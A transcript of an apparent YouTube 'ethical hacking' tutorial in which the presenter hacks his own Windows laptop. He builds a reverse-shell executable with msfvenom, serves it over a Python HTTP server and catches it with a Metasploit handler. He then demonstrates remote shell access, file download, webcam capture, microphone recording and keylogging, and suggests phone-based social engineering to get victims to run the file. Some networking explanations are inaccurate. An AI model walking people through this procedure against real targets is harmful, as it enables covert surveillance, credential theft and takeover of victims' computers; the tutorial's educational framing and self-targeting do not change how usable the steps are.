Hello guys, welcome back to my YouTube channel CodeWave. My name is Abubakar Umar and today I will be teaching you how to do some ethical hacking. So in this video, I'm going to try break into my own computer and I'm going to try and grab pictures and files and just like hack my own laptop just to show how easy it is for you to be a victim. So hackers tend to use like pre-made tools, and all of these can be found on GitHub. And the tool which I'll be using is called Metasploit, and I'll be using Kali Linux, which is used for cybersecurity and ethical hacking and penetration testing. So you'll need to have installed Kali Linux, and you'll have to have installed Oracle VirtualBox. Now, for the VM, it's optional. You can dual boot it, or you can like use it in a USB. But I've just used it in a virtual machine. So I'm just gonna yeah. So as you can see, this is my Kali Linux machine. Uh, so yeah, let us begin. I'm just gonna turn off my camera. Alright. So we will start by identifying our machine's IP version 4 address. So we can do this by simply typing ifconfig. Now as you can see in ifconfig, our inet, we look at our inet address. It is 192.168.0.42. Now a cool thing about this IP address is each of these numbers are made up of 8 bytes. So there are 8 bytes in 192, 8 bytes in 168, 8 bytes in 0, and 8 bytes in 42, if I'm correct. This is our net mask, also known as our subnet, which is 255.255.255.0. As I said before, this is also known as a subnet mask. Yeah, this is, I think it's the local host. I'm not so sure. If you know, kindly correct me. Alright, so we need to note down our IP version 4 address. We can enter 192.168.0.42. Alright, now we don't need this anymore because it's gonna clutter our terminal. So now we will need to start a payload. Now we do this by simply entering our documents. Yeah, so in Kali Linux, this is how we enter our folder. From the terminal, we type cd documents. You can put cd downloads, it will take you to your downloads folder. Cd trash, it will take you to your trash folder. Cd home, it will take you to your home. Cd tbomb, cd venv, cd cam exploit, it will take you to all of these folders as you can see over here. Cd information, stuff like that. Now, uh, we will start using a tool called msfvenom. So we will start by typing this. So our L host will be the IP that we noted down, our IPv4 address. So it was 192.168.0.42. Yeah, and our L port is uh, quadruple 4, so 4 4, so 4444. L port is Yeah. And then after that, we do minus F, make sure it's not in caps, exe. So this makes like an exe application. O backup dot exe. Now for this one, we can put like any name we want because basically we are making like a fake application that when victims download this application, the computer automatically gets hacked and we can easily access everything they have. So only through this application. So we can name it whatever we want. Let us name it code dot exe. Yeah. Yeah. Now we click on enter. All right. As you can see, our application has been saved and downloaded. It is saved as CodeWave. Now, uh, if you see this, you do not need to worry about it. You just ignore it. This also, uh, it does not interfere with this progress at all. So let's continue. If we now, it is now the application is saved in our documents folder, but how to make sure it is properly saved? On Linux, you simply type ls. ls basically allows you to see all the files in the folder. As you can see, I have been experimenting with this tool for quite a while now. I have so many applications over here. But yeah, as you can see, codewave.exe, the fake application that we just made right now. Yeah. So now we want to start the server that like makes like a fake website. So like you can actually get the application on someone's computer. So we'll be using Python for this. Python -m http.server 8080. Yeah. So as you can see, the link uses a HTTP server, not an HTTPS, because a HTTPS server uses uh, encrypted version, like basically a more secure version of browsing. HTTP is not secure, so that is why a lot of attackers tend to use HTTP. It is very easy to obtain, and the ports are easy to monitor and stuff. So I click on enter. As you can see, our um, site has started to host. Now we need to go to a brand new terminal, as you can see, and now we will need to use MSF console. So sudo msf console. So sudo basically allows you to enter in the main root of Linux. So the main uh, like system folder, I guess, like basically the root. So you click on enter. You'll need to enter your password. As you can see, my MSF console is running now. Or oh, sorry, it was, yeah, it's okay. So we'll need to type in this use exploit slash multi slash handler, and we hit enter. Okay, so it has started a reverse shell TCP. That is exactly what we want. Now we are now we are actually setting up the payload, like we are finalizing on it. We're finishing packing it up, as in the payload. So set payload in all capital, Windows x64 interpreter. Now we hit on enter. Is the value? Oh, I have accidentally set two dashes. So set payload Windows 4. Yeah, and as you can see, it has set my payload right here. Set payload. Okay, payload windows. Yeah, it has set over here. Now we'll need to check in on our lhost and lport. So we'll need to type set lhost. Lhost will be our IPv4 address, which was 192.168.0.42. Our hello is set, and I will need to set our lport. So set lport, which is quadruple 4, so 4444. Alright, and then we click on enter. So now we need to actually see if our lhost and lport are actually set up properly, because we don't want any confusions later. So we only have to we have to type options just to double check if everything is working. Yes, and over here, as you can see, our lhost is our IPv4 address, which is 192.168.0.42, and our lport is 4444. This is exactly what we want. Now, for the final thing, we'll just have to do a run. We type run, we click on enter. Now, we'll just have to wait a few moments. Yeah. So if you see this message which states started reverse TCP handler on 192.168.0.42 4444, it means that it has worked. Now, a few more messages I think should pop up. It's taking like a while now. I'm guessing it is my internet speed. Alright, I think it's okay, I guess. Let's just test it out now. So if I've done everything correct, my hacking tool should be working and I should be able to break into my own laptop and steal data, grab my own pictures, and stuff like that. Things bad guys do. So we go to the browser, we type over here the attacker IP, as in the IP of the hacker. So we can type 192.168.0.42, and over here we we put 8080 because that is what our port is listening to. So if we have done it correct, it should take us to the site. Yes, we have done it correct. So as you can see over here, we have all of these applications. What we are looking for is this codewave.exe, or whatever you have named it. Now, hackers usually do this via social engineering, which basically means like manipulating victims to install malicious applications on the device so hackers can gain access. So basically, victims like help the attacker unknowingly. So if I click on this application, I can maybe save it in, let's say, my documents folder. So I'm going to pretend to be a victim who has gotten, like, maybe received a call from like a hacker posing to work for someone like as like a large company. Maybe the attacker has given me a suspicious link which is not secure. It uses a HTTP instead of HTTPS, and the attacker, or the quote unquote guy working for the large company, told me to install their app, which they use it for their dashboard, or just something like that. It can be anything. Uh, so I install the app. I save it in my documents folder. So as you can see, the attack. See, So my antivirus is actually kind of picking me up, and even uh, my Windows antivirus is also picking it up. So we are going to run anyway, just for educational purposes. So this is to show what happens when a victim ignores all the warnings from the antiviruses, the let's say McAfee, or anything, or like Windows antivirus. So let's say me as the victim, I just click on run anyway, and nothing opens up because the app is not real. Behind the app sits like code. It is just pure raw code, which like allows the attacker to gain access to my system. So yes, as you can see, on the victim side, nothing has showed up, nothing is acting weird. So the victim will not know that the computer is hacked, or like anything suspicious is going on. But it is quite different on the attacker side, because as you can see back on Kali Linux, on my first terminal, where we put the Python by Python dash m HTTP server 8080, it has uh, given me information that the application has been opened and has been downloaded. Same thing with Metasploit over here. Started Meterpreter session 1. Yeah. So I already have access to my system. Okay, let's say to the victim's computer. Now I have successfully hacked the victim's computer. Now I can do literally anything I want on the victim's computer. A few examples of it would be, one second, I have these noted down. Let me just go through it. Yeah, so I have access to the victim's computer. I can now I can now check the system info, uh, to check which user account is running on their computer. I can get the ID, I can get the network configuration, I can get the running process. It can also show the current directory. I can also list all the files in the directory. This means I can view all of the victim's files. I can also download the victim's files. I can access the command shell of the target system, and yeah, I can also take a picture through the webcam. I can see a live video of themselves. I can record an audio recording of the victim without the knowing. And then there is something called a keylogger. It's basically when the victim types something on the keyboard, the victim is knowing exactly what the sorry, the attacker knows what the victim is typing. Yeah, so let us begin by simply uh, typing sysinfo to view the info of the victim's computer. Sysinfo. As you can see, it has successfully captured the information of the victim's computer. Let me see if I can zoom in. Um, Zoom in. Sorry, yeah. As you can see, my computer, this is my computer name, and this is my operating system, Windows 11. Now, I know it's working because if come on, because right now it will not say it's using a Debian, which is Kali Linux. It says Windows 11. This is the architecture, the language, which is English, the domain, logged on users. So I have two profiles on this computer. So yeah, uh, and then I can check which user account is running under. So I can type in get UID. Now, if I click on enter, it will show me the server username, which is basically the name, like the name of the model of the laptop and the name of the user who's using the laptop. So it shows over here Abu Bakr Omar, of course, which is my name, and this is my laptop's model number. So this is also pretty dangerous for someone to get. And then something more than that, I can also get the IP configuration. IP config. As you can see, it shows my IP version 4, IP version 6 address, my net mask. It shows my hardware MAC address. It shows my name, which is Microsoft Wi-Fi Direct Virtual Adapter. My hardware MAC address. Uh, yeah, and this is just very, very sensitive information, which I think I'm going to blur out in this video. And then I can check all the running processes by typing ps, and it will show me every single thing which is running, uh, like which is running backend on my computer, like it's running behind the scenes. Because of course, with Windows, there's always like background updates, background running processes. So an attacker can also view it. The victim will not know anything that is going on in the background, but an attacker can, as you can see. So right now I'm posing as the attacker, and this is the victim's background processes which is running. This is the system 32 and stuff like that. So I can show the current directory by just typing pwd. This is the current directory, and then I can also list all the files in this directory. So ls, as you can see. Now I can download the files on Kali Linux. Now, for now, I don't want to download any files. Uh, but yeah, so we're just gonna skip that. But you can try it on your own. You can just download. And over here, you can click. You can type the file name. Don't actually type this. Just download file name. So, for example, if the file name is maybe website.exe, or something like that, opera.exe, it will install on your Kali Linux machine. Now, I don't want to install Opera. So yeah, now we can access the command shell of a target system by just typing shell. As you can see, the channel has been created. Now we have accessed the main shell of the victim's computer. Now from this we can type who am I, which states who the user is. Who am I? I am Abu Bakr Omar, and this is my laptop model number. Yeah, it's scary, but it's fun. Yeah, so then if we want to exit the shell, we can just click on exit. Now we are back on the Metasploit. Now let's say we want to like get a screenshot of the victim. This is super duper easy to do. You can just click on webcam underscore snap. So this one just takes a single photo of the victim through the victim's webcam. So if we click on enter, as you can see, it's starting, and it should take a picture of the victim, aka me. It is saying webcam start operation failed. Huh. Operation failed. Let us try again. Webcam underscore stop. Stopped. Alright. So it keeps on saying stop. But okay, let us try starting a live feed. So webcam underscore stream. Now, if I'm correct, huh, it should have opened up a a site. Oh, wait, as you can see, yeah, it it's it's trying to work. Um, 1 second, let me just close this tab. Alright, I'm not so sure why it's not working. I'll have to do some troubleshooting. I'm guessing there's something going on in the background over my network. But over here, like a box should pop up showing the live camera of the victim. So, like you're basically spying on the victim. So, yeah, let us just move on. So, let's just close this. Alright, now we can also record the audio by tapping record underscore mic. So this is just a sample audio. Um, this is a sample audio. I'm the victim, and the attacker has a audio recording. Sorry. So as you can see, we will listen to the audio recording. It is this one. So this audio, audio I'm and yeah, as you heard, it was kind of glitchy and it was lagging a bit, but that's normal. But as long as the attacker has a basic sense of what the victim is talking about, then that is also pretty dangerous. Now, for keylogging, basically spying on what the victim is typing on the computer, we can type on key scan underscore start. As you can see, it has started. So now we can go back to our Windows machine, aka our victim computer. So let's become the victim again. So me as a victim, what do I like to search? Maybe I want to access my bank, or I want to log into my Instagram, TikTok, X, as in Twitter, Facebook, anything. So maybe I can maybe like type in uh, example text over here. So this text can mean anything. It can mean like it can be like login details, bank information, financial stuff, just overall sensitive information. So as you can see, it has been saved. If me as the attacker, if I wanted to actually see what the victim has typed, I can just click on. I can just type scan underscore dump, enter, and as you can see, it is a bit broken. I think, yeah, it is definitely an issue with my network connection, because before it was working perfectly. Even the webcam had been showing my feed perfectly. I was able to see the victim, aka myself, through the webcam. So yeah, as you can see, example text. Now the attacker can see what the victim was typing. I can stop it by just typing keyscan underscore stop, enter. And as you can see, that is our uh, way of, like, okay, that is how hackers can hack into systems very very easily. So be very careful when someone sends you a link with a HTTP. Hackers can also use HTTPS, because I mean, it's 2026, it's a modern age. But yeah, just overall be careful, and yeah, now you know. By the way, this video was only for educational purposes. I do not promote hacking or breaking into systems. I am a white hat hacker, I would say. Uh, yeah, but I guess I'm multi hat. All right. So see you next video. Bye bye.